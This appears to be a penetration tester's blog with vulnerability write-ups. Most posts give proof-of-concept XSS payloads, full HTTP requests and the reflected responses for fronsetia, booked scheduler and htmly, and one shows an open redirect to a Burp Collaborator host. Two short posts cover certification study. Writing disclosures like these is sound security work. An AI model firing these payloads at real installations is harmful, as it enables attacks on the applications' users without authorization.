Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

 Description

- It was found that the application was vulnerable to Reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit main page of the application.
  2. In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]






















Thursday, 7 November 2024

Its Official - BSCP Certified

Its official. Im BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)













Key takeaways from the attempts:

  • Dont give up 
  • Its a difficult exam
  • Check all the relevant labs in the Portswigger Academy
  • Check for bypasses in the Academy labs 
  • Make sure to have a good list of notes such as payloads and bypasses ready 

Thats it folks !

Saturday, 19 October 2024

Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Reflected XSS on several pages


Reflected XSS #1 - "resevervation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on




Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
  2. In the "resume" parameter add the redirect URL e.g. Burp Collab
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Saturday, 5 October 2024

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. Will keep updating my blog on what have been learned so far. 


Introduction

  • Instructor is Jason Lam 
  • The course comes with six books in PDF and hardcopy format
  • I opted in for purchasing exam voucher and two practice tests
  • The course gives VM so you could practice
  • Also has ondemand videos for each module and topic


Book 1:

  • Focuses on misconfigurations
  • Architecture security
  • Basics of how the web works
  • SSRF
  • HTTP methods

Book 2:
  • Input validation
  • Injection attacks and their mitigations
  • CSRF and other attacks including defences
  • File uploads functionality
  • Unicode attacks


Book 3:

  • Authentication security
  • Authorization security
  • SAML/Oauth security


Book 4:

    • Frontend security
    • AJAX security
    • Webservices
    • NodeJS security
    • Clickjacking
    • Browser security


    Book 5:

        • API security
        • Graphql security
        • Deserialization

        The link for the course is here:

        https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/



        Monday, 16 September 2024

        Friday Fun Pentest Series - 11 - Stored XSS in "Edit Profile" - htmlyv2.9.9


        Description

        - It was found that the application suffers from stored XSS

        - The vulnerability was found to be in the "Edit Profile" page

        - Vulnerable parameter was "Content"


        Stored XSS in "Edit Profile"

        Steps to Reproduce:

        1. Login as author
        2. Browse to "Edit Profile"
        3. In "Content" field add payload "><img src=x onerror=alert(1)>
        4. Then refresh the "Edit Profile" page

        Friday Fun Pentest Series - 10 - Stored XSS in "Menu Editor" - htmlyv2.9.9

        Description

        - It was found that the application suffers from stored XSS

        - The vulnerability was found to be in the "Menu Editor" page

        - Vulnerable parameters were "Name" and "Slug"


        Stored XSS in "Menu Editor"

        Steps to Reproduce:

        1. Login as admin or author
        2. Browse to "Menu Editor"
        3. In "Name" field add payload "><img src=x onerror=alert(1)>
        4. In "Slug" field add payload "><img src=x onerror=alert(1)>
        5. Click "Save Edit" > "Save Menu"


        Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

          Description - It was found that the application was vulnerable to Reflected XSS Reflected XSS  #1 - " show_operations.jsp " Step...